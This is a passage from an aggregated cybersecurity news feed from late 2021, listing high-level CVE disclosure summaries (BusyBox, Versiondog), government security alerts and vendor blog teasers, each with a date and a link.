2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42385
CVE-2021-42384
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42384
CVE-2021-42383
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42383
CVE-2021-42382
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42382
CVE-2021-42381
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42381
CVE-2021-42380
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42380
CVE-2021-42379
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42379
CVE-2021-42378
2021-11-09T00:00:00Z | 1636416000

A use-after-free in awk leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i functionRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42378
CVE-2021-42377
2021-11-09T00:00:00Z | 1636416000

An attacker-controlled pointer free in hush leads to denial of service and possible code execution when processing a crafted shell command, due to the shell mishandling the &&& string. This may be used for remote code execution under rare conditions of filtered command input.Read more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42377
CVE-2021-42376
2021-11-09T00:00:00Z | 1636416000

A NULL pointer dereference in hush leads to denial of service when processing a crafted shell command, due to missing validation after a \x03 delimiter character. This may be used for DoS under very rare conditions of filtered command input.Read more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42376
CVE-2021-42375
2021-11-09T00:00:00Z | 1636416000

An incorrect handling of a special element in ash leads to denial of service when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This may be used for DoS under rare conditions of filtered command input.Read more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42375
CVE-2021-42374
2021-11-09T00:00:00Z | 1636416000

An out-of-bounds heap read in unlzma leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that internally supports LZMA compression.Read more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42374
CVE-2021-42373
2021-11-09T00:00:00Z | 1636416000

A NULL pointer dereference in man leads to denial of service when a section name is supplied but no page argument is givenRead more: "Unboxing Busybox: 14 Vulnerabilities Uncovered by Claroty, JFrog"

https://claroty.com/team82/disclosure-dashboard/cve-2021-42373
CVE-2021-37207
2021-11-09T00:00:00Z | 1636416000

CWE-732: INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCEThe affected application assigns improper access rights to a specific folder containing configuration files.

https://claroty.com/team82/disclosure-dashboard/cve-2021-37207
Celebrating Hispanic Heritage Month with Ohana
2021-11-08T14:00:57Z | 1636380057

National Hispanic American Heritage Month (September 15 to October 15) is a time to recognize the achievements and contributions of trailblazing Hispanic Americans whose legacies have inspired the world. Akamai stands with our American colleagues whose ancestors came from Spain, Mexico, the Caribbean, and Central and South America in celebrating those achievements. And with groups like the Ohana ERG, we?re able to use this month to share insights that help make our company a better place to be.

https://www.akamai.com/blog/culture/celebrating-hispanic-heritage-month-with-ohana
Internet Resilience, Part 2: What It Takes to ?Just Work?
2021-11-08T14:00:00Z | 1636380000

One of the greatest signs of the success of the internet as a technology is how little the average person thinks about it. I?m not talking about the content itself. The streaming videos, online shopping sites, news and educational content, workplace productivity tools, and many other pieces of content we view and interact with online garner a great deal of attention. I?m instead talking about what?s involved in getting that content delivered reliably, quickly, and securely to a device.

https://www.akamai.com/blog/performance/internet-resilience-part2-what-it-takes-to-just-work
Akamai App & API Protector: Maximize Security Through Simplicity
2021-11-08T11:30:00Z | 1636371000

Building incredible digital experiences often involves leveraging serverless edge computing, microservices-based architectures, IaaS environments, client-side functionality, and APIs. These modern development practices, while designed to produce highly personalized, fast, and always-on user experiences, also inextricably introduce new vulnerabilities and risks.

https://www.akamai.com/blog/news/akamai-app-and-api-protector-maximize-security-through-simplicity
Keeping Up with Biden Administration Cybersecurity Mandates
2021-11-05T16:00:00Z | 1636128000

With Wednesday?s sweeping cybersecurity mandates issued by the Biden administration, patching Common Vulnerabilities and Exposures (CVEs) are top of mind ? for both federal and private-sector companies alike ? to help prevent damaging intrusions. Intensifying the pressure surrounding the latest round of mandates, federal agencies are required to address high-risk vulnerabilities discovered in 2021 within two weeks. However, for the vast majority of organizations and their security teams, addressing every critical vulnerability at the software or infrastructure level quickly is not feasible. Instead, many enterprise defenders look to virtual patching via solutions like WAF policy updates and rule changes as a quick fix to help reduce immediate risk, while longer-term software updates are issued.

https://www.akamai.com/blog/news/akamai-stays-one-step-ahead-of-biden-cve-mandates
Citizens informed about major information security incidents and events via the app 112 Suomi
2021-11-05T08:10:13Z | 1636099813

The NCSC-FI at the Finnish Transport and Communications Agency (Traficom) has begun using the mobile application 112 Suomi as a channel to provide information about major information security incidents and events that affect citizens. The majority of people in Finland use digital services and devices in their daily lives, and it is important that people are informed about incidents that affect these services. In the modern world, cyber security is one of the basic skills we all need.

https://www.kyberturvallisuuskeskus.fi/en/news/citizens-informed-about-major-information-security-incidents-and-events-app-112-suomi
Citizens informed about major information security incidents and events via the app 112 Suomi
2021-11-05T08:10:13Z | 1636099813

The NCSC-FI at the Finnish Transport and Communications Agency (Traficom) has begun using the mobile application 112 Suomi as a channel to provide information about major information security incidents and events that affect citizens. The majority of people in Finland use digital services and devices in their daily lives, and it is important that people are informed about incidents that affect these services. In the modern world, cyber security is one of the basic skills we all need.

https://www.kyberturvallisuuskeskus.fi/en/news/citizens-informed-about-major-information-security-incidents-and-events-app-112-suomi
HAVARO service recognised as Information Security Product of the Year
2021-11-05T08:08:21Z | 1636099701

Tietoturva – Finnish Information Security Association ry has chosen the HAVARO service as the Information Product of the Year. HAVARO monitors information security threats and incidents, and warns organisations about them. The service has been developed in cooperation by the NCSC-FI at the Finnish Transport and Communications Agency (Traficom) and the National Emergency Supply Agency.

https://www.kyberturvallisuuskeskus.fi/en/news/havaro-service-recognised-information-security-product-year
HAVARO service recognised as Information Security Product of the Year
2021-11-05T08:08:21Z | 1636099701

Tietoturva – Finnish Information Security Association ry has chosen the HAVARO service as the Information Product of the Year. HAVARO monitors information security threats and incidents, and warns organisations about them. The service has been developed in cooperation by the NCSC-FI at the Finnish Transport and Communications Agency (Traficom) and the National Emergency Supply Agency.

https://www.kyberturvallisuuskeskus.fi/en/news/havaro-service-recognised-information-security-product-year
The Future of the Enterprise Firewall is in The Cloud
2021-11-05T06:57:14Z | 1636095434

If you’re like many of the IT leaders we encounter, you’re likely facing a refresh on your firewall appliances or will face one soon enough. And while the standard practice was to exchange one firewall appliance for another, increasingly, enterprises seem to be replacing firewall appliances with firewall-as-a-service (FWaaS). Yes, that’s probably not news coming... The post The Future of the Enterprise Firewall is in The Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-future-of-the-enterprise-firewall-is-in-the-cloud/
Security Alert (A21-11-06): Vulnerability in Linux Operating Systems
2021-11-05T04:00:00Z | 1636084800

A heap-overflow vulnerability was found in the Transparent Inter-Process Communication (TIPC) module of the Linux kernel.

https://www.govcert.gov.hk/en/alerts_detail.php
VB2021 localhost videos available on YouTube
2021-11-04T15:11:00Z | 1636038660

VB has made all VB2021 localhost presentations available on the VB YouTube channel, so you can now watch - and share - any part of the conference freely and without registration. Read more

https://www.virusbulletin.com/blog/2021/11/vb2021-localhost-videos-available-youtube/
NCSC-FI issued an alert on attempts to steal online banking credentials via fake messages from My Kanta Pages and Suomi.fi
2021-11-04T11:41:33Z | 1636026093

The NCSC-FI published a severe alert about attempts to steal online banking credentials via fake messages from My Kanta Pages and Suomi.fi. There are active campaigns in which fraudsters try to steal online banking details via fake website links sent by email pretending to contact people in the name of My Kanta Pages and the Suomi.fi service. If you use online services via your web browser, always log in to the service by typing the full address of the website in your browser’s address bar.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-issued-alert-attempts-steal-online-banking-credentials-fake-messages-my-kanta-pages
NCSC-FI issued an alert on attempts to steal online banking credentials via fake messages from My Kanta Pages and Suomi.fi
2021-11-04T11:41:33Z | 1636026093

The NCSC-FI published a severe alert about attempts to steal online banking credentials via fake messages from My Kanta Pages and Suomi.fi. There are active campaigns in which fraudsters try to steal online banking details via fake website links sent by email pretending to contact people in the name of My Kanta Pages and the Suomi.fi service. If you use online services via your web browser, always log in to the service by typing the full address of the website in your browser’s address bar.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-issued-alert-attempts-steal-online-banking-credentials-fake-messages-my-kanta-pages
Dependency confusion exposes to attacks
2021-11-04T11:38:32Z | 1636025912

Supply chain attacks are here to stay, and organisations often have to rely on several external software suppliers when building their systems. According to a report published earlier this year, a researcher managed to hack into the systems of Apple, Microsoft and others by uploading his own code packages to their repositories. To hack the systems, the researcher exploited errors in the package management of widely used programming languages. Dependency confusion may arise when an organisation’s internal and external repositories include packages with identical names.

https://www.kyberturvallisuuskeskus.fi/en/news/dependency-confusion-exposes-attacks
Dependency confusion exposes to attacks
2021-11-04T11:38:32Z | 1636025912

Supply chain attacks are here to stay, and organisations often have to rely on several external software suppliers when building their systems. According to a report published earlier this year, a researcher managed to hack into the systems of Apple, Microsoft and others by uploading his own code packages to their repositories. To hack the systems, the researcher exploited errors in the package management of widely used programming languages. Dependency confusion may arise when an organisation’s internal and external repositories include packages with identical names.

https://www.kyberturvallisuuskeskus.fi/en/news/dependency-confusion-exposes-attacks
Sharp increase in attempts to phish online banking details
2021-11-04T11:35:30Z | 1636025730

In late October, we received a significant number of new reports of email messages phishing banking credentials. This is a clear sign of a new wave of fraud. What makes the new campaign different from previous ones is that fraudulent messages have been sent in the name of all Finnish banks.

https://www.kyberturvallisuuskeskus.fi/en/news/sharp-increase-attempts-phish-online-banking-details
Sharp increase in attempts to phish online banking details
2021-11-04T11:35:30Z | 1636025730

In late October, we received a significant number of new reports of email messages phishing banking credentials. This is a clear sign of a new wave of fraud. What makes the new campaign different from previous ones is that fraudulent messages have been sent in the name of all Finnish banks.

https://www.kyberturvallisuuskeskus.fi/en/news/sharp-increase-attempts-phish-online-banking-details
NCSC-FI conducts annual search for unprotected automation systems
2021-11-04T11:26:59Z | 1636025219

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom looks for unprotected automation equipment in information networks. The aim is to improve situational awareness and cyber security in Finland. The results are compared with those obtained in previous years.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kartoitus2021
NCSC-FI conducts annual search for unprotected automation systems
2021-11-04T11:26:59Z | 1636025219

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom looks for unprotected automation equipment in information networks. The aim is to improve situational awareness and cyber security in Finland. The results are compared with those obtained in previous years.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kartoitus2021
NCSC-NL publishes factsheet "PKIoverheid will stop issuing web certificates: Choose another issuer"
2021-11-04T09:00:00Z | 1636016400

Logius has announced that it will stop issuing publicly trusted web server certificates in the PKIoverheid system. If your organisation is currently using such certificates, you will need to find an alternative.

https://english.ncsc.nl/latest/news/2021/november/03/pkioverheid-stops-web-certificates
High Threat Security Alert (A21-11-04): Multiple vulnerabilities in GitLab
2021-11-04T04:00:00Z | 1635998400

GitLab has released 13.10.3, 13.9.6 and 13.8.8 to fix the vulnerabilities in various versions of GitLab.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-11-05): Multiple Vulnerabilities in Cisco Products
2021-11-04T04:00:00Z | 1635998400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Gerbv drill format T-code tool number out-of-bounds write vulnerability
2021-11-04T00:00:00Z | 1635984000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1402
CVE-2021-42701
2021-11-04T00:00:00Z | 1635984000

CWE-471: MODIFICATION OF ASSUMED-IMMUTABLE DATA (MAID) An attacker could prepare a specially crafted project file that, if opened, would attempt to connect to the cloud and trigger a man in the middle (MiTM) attack. This could allow an attacker to obtain credentials and take over the user's cloud account.

https://claroty.com/team82/disclosure-dashboard/cve-2021-42701
CVE-2021-42699
2021-11-04T00:00:00Z | 1635984000

CWE-319 : CLEARTEXT TRANSMISSION OF SENSITIVE INFORMATION The affected product is vulnerable to cookie information being transmitted as cleartext over HTTP. An attacker can capture network traffic, obtain the user's cookie and take over the account.

https://claroty.com/team82/disclosure-dashboard/cve-2021-42699
CVE-2021-42698
2021-11-04T00:00:00Z | 1635984000

CWE-502: DESERIALIZATION OF UNTRUSTED DATA Project files are stored memory objects in the form of binary serialized data that can later be read and deserialized again to instantiate the original objects in memory. Malicious manipulation of these files may allow an attacker to corrupt memory.

https://claroty.com/team82/disclosure-dashboard/cve-2021-42698
CVE-2021-42543
2021-11-04T00:00:00Z | 1635984000

CWE-242: USE OF INHERENTLY DANGEROUS FUNCTION The affected application uses specific functions that could be abused through a crafted project file, which could lead to code execution, system reboot, and system shutdown.

https://claroty.com/team82/disclosure-dashboard/cve-2021-42543
Akamai + Guardicore: End-to-End Zero Trust
2021-11-03T13:00:00Z | 1635944400

Ransomware attacks increased by over 150% in 2020. As criminals find new ways to attack networks and systems, protect work-from-home employees with Akamai.

https://www.akamai.com/blog/news/akamai-guardicore-end-to-end-zero-trust
Finding and Fixing DOM-based XSS with Static Analysis
2021-11-03T09:37:03Z | 1635932223

Despite all the efforts of fixing Cross-Site Scripting (XSS) on the web, it continuously ranks as one of the most dangerous security issues in software. In particular, DOM-based XSS is … Read more

https://blog.mozilla.org/attack-and-defense/2021/11/03/finding-and-fixing-dom-based-xss-with-static-analysis/
Security Alert (A21-11-03): Multiple Vulnerabilities in Firefox
2021-11-03T04:00:00Z | 1635912000

Mozilla has published the advisories (MFSA2021-48 and MFSA2021-49) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
How to Detect DNS Tunneling in the Network?
2021-11-02T08:14:55Z | 1635840895

In the past several years, we have seen multiple malware samples using DNS tunneling to exfiltrate data. In June, Microsoft Security Intelligence warned about BazarCall (or BazaLoader), a scam infecting victims with malware to get them to call a phony call center. BazarCall can lead to Anchor malware that uses DNS tunneling to communicate with... The post How to Detect DNS Tunneling in the Network? appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-detect-dns-tunneling-in-the-network/
Security Alert (A21-11-02): Multiple vulnerabilities in Android
2021-11-02T04:00:00Z | 1635825600

Google has released Android Security Bulletin November 2021 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Holiday Readiness, Part Four: What You Should Be Thinking About One Month Out ? Monitoring and Alerting
2021-11-01T13:00:00Z | 1635771600

November is here. Now it?s crunch time. Hopefully, implementing the solutions in parts one through three of this series has kept you busy over the last few months. In those articles, we covered security, flash crowd management, disaster recovery, and performance optimization checklists. If you are not in a code freeze yet, work with your Akamai account team to review the content to determine what features you still have time to enable.

https://www.akamai.com/blog/trends/holiday-readiness-part-four-what-you-should-be-thinking-about-one-month-out-monitoring-and-alerting
Fraudsters stealing banking credentials with fake My Kanta Pages and Suomi.fi messages
2021-11-01T09:55:19Z | 1635760519

There are active campaigns in which fraudsters try to steal online banking details via fake website links sent by email pretending to contact people in the name of My Kanta Pages and the Suomi.fi service. If you use the services via your web browser, always log in to the service by typing the full address of the website in your browser’s address bar. Using the relevant mobile applications will also protect you against attempts to steal your banking credentials.

https://www.kyberturvallisuuskeskus.fi/en/fraudsters-stealing-banking-credentials-fake-my-kanta-pages-and-suomifi-messages
High Threat Security Alert (A21-11-01): Multiple vulnerabilities in Microsoft Edge (Chromium-based)
2021-11-01T04:00:00Z | 1635739200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-10-21): Multiple vulnerabilities in Google Chrome
2021-10-29T04:00:00Z | 1635480000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-22): Vulnerability in ISC BIND
2021-10-29T04:00:00Z | 1635480000

ISC has released a security update to fix a vulnerability in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
MKM: Eesti.ee ettevõtja digivärav leidis esimese arenduspartneri
2021-10-28T09:18:53Z | 1635412733

Riigi Infosüsteemi Amet (RIA) sõlmis hankelepingu ettevõttega Fujitsu Estonia AS, mille eesmärk on aastatel 2021–2022 luua riigiportaali eesti.ee ettevõtjatele mõeldud digivärava esmased funktsionaalsused.

https://ria.ee/uudised/mkm-eestiee-ettevotja-digivarav-leidis-esimese-arenduspartneri
Security Alert (A21-10-20): Multiple Vulnerabilities in Cisco Products
2021-10-28T04:00:00Z | 1635393600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Securing the Enterprise Network for the Office Anywhere
2021-10-27T13:00:00Z | 1635339600

During the pandemic, it was reassuring to see businesses demonstrating resilience and enabling remote working for their employees ? in some cases, practically overnight. As businesses slowly reopen their doors, it is clear that many things have changed, key amongst them the increasing risks to the enterprise network as more work is carried out from mobile devices.

https://www.akamai.com/blog/security/securing-the-enterprise-network-for-the-office-anywhere
Security Alert (A21-10-19): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-10-27T04:00:00Z | 1635307200

Apple has released iOS 15.1 and iPadOS 15.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Ransomware is on the Rise – Cato’s Security as a Service can help.
2021-10-24T10:06:31Z | 1635069991

The post Ransomware is on the Rise – Cato’s Security as a Service can help. appeared first on Cato Networks.

https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help/
Security Alert (A21-10-17): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-10-22T04:00:00Z | 1634875200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-18): Vulnerability in Pulse Secure Products
2021-10-22T04:00:00Z | 1634875200

Pulse Secure has published a security advisory to address a vulnerability in Pulse Connect Secure system software.

https://www.govcert.gov.hk/en/alerts_detail.php
Your Best Defense Against Ransomware: Akamai + Guardicore
2021-10-21T15:30:37Z | 1634830237

For decades, Akamai has been focused on solving tough problems for our customers. We started by addressing the challenges of the ?World Wide Wait,? and quickly started to leverage our edge network?s scale, proximity to users, and expert operations staff to mitigate security threats for our customers. Today, Akamai has category-leading solutions including DDoS, web app and API protection, bot management, and Zero Trust Network Access. Given the incredible surge in ransomware attacks, we are excited to be adding Zero Trust segmentation to our portfolio through the acquisition of Guardicore.

https://www.akamai.com/blog/news/your-best-defense-against-ransomware-akamai-and-guardicore
Security Alert (A21-10-16): Multiple Vulnerabilities in Cisco Products
2021-10-21T04:00:00Z | 1634788800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-14): Multiple Vulnerabilities in Oracle Java and Oracle Products (October 2021)
2021-10-20T04:00:00Z | 1634702400

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-10-15): Multiple vulnerabilities in Google Chrome
2021-10-20T04:00:00Z | 1634702400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Publicados resultados do Estudo sobre os Profissionais de Cibersegurança
2021-10-20T00:00:00Z | 1634688000

Os resultados da 2ª Edição do Estudo sobre os Profissionais de Cibersegurança e Segurança da Informação em Portugal já foram publicados aqui.Este estudo foi realizado através de questionário online, aberto à comunidade, pela AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação, com o apoio do Observatório de Cibersegurança do Centro Nacional de Cibersegurança. Os dados publicados permitem conhecer as características e a evolução dos profissionais de uma área tão dinâmica e decisiva para a cibersegurança do país.Agradecemos a participação de todos os envolvidos.

https://dyn.cncs.gov.pt/pt/detalhe/art/135596/publicados-resultados-do-estudo-sobre-os-profissionais-de-ciberseguranca
Over 25% of Malicious JavaScript Is Being Obfuscated
2021-10-19T13:00:00Z | 1634648400

Last year, Akamai released research on obfuscation techniques being used by cybercriminals to create malicious JavaScript. The code is unreadable, un-debuggable, and as a result, much more challenging to analyze and detect.

https://www.akamai.com/blog/security/over-25-percent-of-malicious-javascript-is-being-obfuscated
CVE-2021-38481
2021-10-19T00:00:00Z | 1634601600

CWE-89: SQL INJECTION The scheduler service running on a specific TCP port enables the user to start and stop jobs. There is no sanitation of the supplied JOB ID provided to the function. An attacker may send a malicious payload that can enable the user to execute another SQL expression by sending a specific string.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38481
CVE-2021-38479
2021-10-19T00:00:00Z | 1634601600

CWE-787: OUT-OF-BOUNDS WRITE Many API function codes receive raw pointers remotely from the user and trust these pointers as valid in-bound memory regions. An attacker can manipulate API functions by writing arbitrary data into the resolved address of a raw pointer.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38479
CVE-2021-38477
2021-10-19T00:00:00Z | 1634601600

CWE-73: EXTERNAL CONTROL OF FILE NAME OR PATH There are multiple API function codes that permit reading and writing data to or from files and directories, which could lead to the manipulation and/or the deletion of files.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38477
CVE-2021-38475
2021-10-19T00:00:00Z | 1634601600

CWE-732: INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE The database connection to the server is performed by calling a specific API, which could allow an unprivileged user to gain SYSDBA permissions.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38475
CVE-2021-38473
2021-10-19T00:00:00Z | 1634601600

CWE-119: IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER The affected product's code base doesn't properly control arguments for specific functions, which could lead to a stack overflow.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38473
CVE-2021-38471
2021-10-19T00:00:00Z | 1634601600

CWE-434: UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPEThere are multiple API function codes that permit data writing to any file, which may allow an attacker to modify existing files or create new files.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38471
CVE-2021-38469
2021-10-19T00:00:00Z | 1634601600

CWE-427: UNCONTROLLED SEARCH PATH ELEMENT Many of the services used by the affected product do not specify full paths for the DLLs they are loading. An attacker can exploit the uncontrolled search path by implanting their own DLL near the affected product's binaries, thus hijacking the loaded DLL.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38469
CVE-2021-38467
2021-10-19T00:00:00Z | 1634601600

CWE-416: USE AFTER FREE A specific function code receives a raw pointer supplied by the user and deallocates this pointer. The user can then control what memory regions will be freed and cause use-after-free condition.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38467
CVE-2021-38465
2021-10-19T00:00:00Z | 1634601600

CWE-400: UNCONTROLLED RESOURCE CONSUMPTION The webinstaller is a Golang web server executable that enables the generation of an Auvesy image agent. Resource consumption can be achieved by generating large amounts of installations, which are then saved without limitation in the temp folder of the webinstaller executable.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38465
CVE-2021-38463
2021-10-19T00:00:00Z | 1634601600

CWE-400: UNCONTROLLED RESOURCE CONSUMPTION The affected product does not properly control the allocation of resources. A user may be able to allocate unlimited memory buffers using API functions.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38463
CVE-2021-38461
2021-10-19T00:00:00Z | 1634601600

CWE-321: USE OF HARD-CODED CRYPTOGRAPHIC KEY The affected product uses a hard-coded blowfish key for encryption/decryption processes. The key can be easily extracted from binaries.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38461
CVE-2021-38459
2021-10-19T00:00:00Z | 1634601600

CWE-294: AUTHENTICATION BYPASS BY CAPTURE-REPLAY The data of a network capture of the initial handshake phase can be used to authenticate at a SYSDBA level. If a specific .exe is not restarted often, it is possible to access the needed handshake packets between admin/client connections. Using the SYSDBA permission, an attacker can change user passwords or delete the database.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38459
CVE-2021-38457
2021-10-19T00:00:00Z | 1634601600

CWE-284: IMPROPER ACCESS CONTROL The server permits communication without any authentication procedure, allowing the attacker to initiate a session with the server without providing any form of authentication.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38457
CVE-2021-38455
2021-10-19T00:00:00Z | 1634601600

CWE-20: IMPROPER INPUT VALIDATION The affected product's OS Service does not verify any given parameter. A user can supply any type of parameter that will be passed to inner calls without checking the type of the parameter or the value.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38455
CVE-2021-38453
2021-10-19T00:00:00Z | 1634601600

CWE-15: EXTERNAL CONTROL OF SYSTEM OR CONFIGURATION SETTING Some API functions allow interaction with the registry, which includes reading values as well as data modification.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38453
CVE-2021-38451
2021-10-19T00:00:00Z | 1634601600

CWE-125: OUT-OF-BOUNDS READ The affected product's proprietary protocol CSC allows for calling numerous function codes. In order to call those function codes, the user must supply parameters. There is no sanitation on the value of the offset, which allows the client to specify any offset and read out-of-bounds data.Successful exploitation of these vulnerabilities could allow an attacker to achieve remote code execution, and acquire complete remote control over the machine. Read: "Claroty, Auvesy Coordinate Disclosure on Versiondog Vulnerabilities"

https://claroty.com/team82/disclosure-dashboard/cve-2021-38451
CVE-2021-38449
2021-10-19T00:00:00Z | 1634601600

